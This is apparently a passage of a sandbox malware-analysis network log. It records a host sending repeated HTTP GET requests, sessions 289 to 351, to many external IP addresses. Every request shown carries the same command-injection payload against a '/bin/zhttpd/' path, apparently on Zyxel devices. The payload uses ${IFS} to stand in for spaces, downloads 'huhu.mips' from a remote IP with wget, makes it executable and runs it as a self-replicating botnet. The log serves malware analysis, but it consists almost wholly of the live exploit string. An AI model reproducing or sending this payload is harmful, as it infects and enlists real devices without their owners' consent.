                                              Jan 29, 2024 07:03:00.536968946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              289192.168.2.1439808118.194.217.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:00.537084103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              290192.168.2.1439416220.250.132.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.540576935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              291192.168.2.143672619.177.138.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.540621996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              292192.168.2.1449984106.93.86.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.540656090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              293192.168.2.1452504121.245.181.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.540659904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              294192.168.2.1456622182.141.33.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.540725946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              295192.168.2.145363425.57.136.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.540747881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              296192.168.2.1459062208.196.4.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.540781021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              297192.168.2.144537832.164.147.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.540822029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              298192.168.2.1442194122.36.191.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.540857077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              299192.168.2.1433568160.169.233.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.540868044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              300192.168.2.143910296.249.160.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.541068077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              301192.168.2.1460194199.127.89.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:01.541099072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              302192.168.2.144307034.170.90.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.551639080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              303192.168.2.1443044159.50.73.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.551692963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              304192.168.2.1442894174.221.76.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.551876068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              305192.168.2.143298088.216.82.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.551901102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              306192.168.2.1437446190.78.181.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.551923990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              307192.168.2.145942014.143.103.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.551958084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              308192.168.2.1455144100.189.167.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552048922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              309192.168.2.1456418172.128.201.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552073002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              310192.168.2.145152689.90.2.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552105904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              311192.168.2.1436546178.136.38.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552160978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              312192.168.2.1439630150.148.116.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552185059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              313192.168.2.1457476212.135.94.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552215099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              314192.168.2.1460136200.69.248.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552283049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              315192.168.2.145257043.94.149.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552306890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              316192.168.2.1450284206.156.30.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552339077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              317192.168.2.1436444140.153.68.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552402973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              318192.168.2.144781064.7.185.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552429914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              319192.168.2.143989463.244.41.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552462101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              320192.168.2.1434074123.150.61.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552531958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              321192.168.2.1445550148.63.230.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552542925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              322192.168.2.145053067.220.238.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552577972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              323192.168.2.145824413.214.204.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552618980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              324192.168.2.143340087.209.209.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552670002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              325192.168.2.1447164150.247.172.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552673101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              326192.168.2.1456368137.50.165.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552726984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              327192.168.2.1433806176.241.191.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552752018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              328192.168.2.143485697.127.97.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552786112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              329192.168.2.1453010160.169.82.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552817106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              330192.168.2.1445254145.84.87.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552901030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              331192.168.2.1433952204.15.92.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552927017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              332192.168.2.1452498179.132.50.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.552982092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              333192.168.2.1435414166.221.38.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553052902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              334192.168.2.1444864209.235.50.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553091049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              335192.168.2.1448944194.83.242.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553147078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              336192.168.2.144960267.133.240.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553183079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              337192.168.2.1448008209.10.6.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553206921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              338192.168.2.1452830211.88.60.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553267956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              339192.168.2.1449452173.91.81.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553291082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              340192.168.2.144770872.189.253.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553340912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              341192.168.2.145100420.61.115.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553386927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              342192.168.2.1457628204.206.75.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553415060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              343192.168.2.144045285.150.218.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553432941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              344192.168.2.1453932202.57.145.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553469896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              345192.168.2.144245214.204.85.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553505898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              346192.168.2.144496863.52.5.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553579092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              347192.168.2.1450964112.37.119.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553623915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              348192.168.2.146062071.106.155.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553646088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              349192.168.2.145986618.174.93.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553680897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              350192.168.2.1450696114.188.210.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553709030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              351192.168.2.1443076162.207.16.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553731918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              352192.168.2.143936494.98.230.244443
                                              TimestampBytes transferredDirectionData
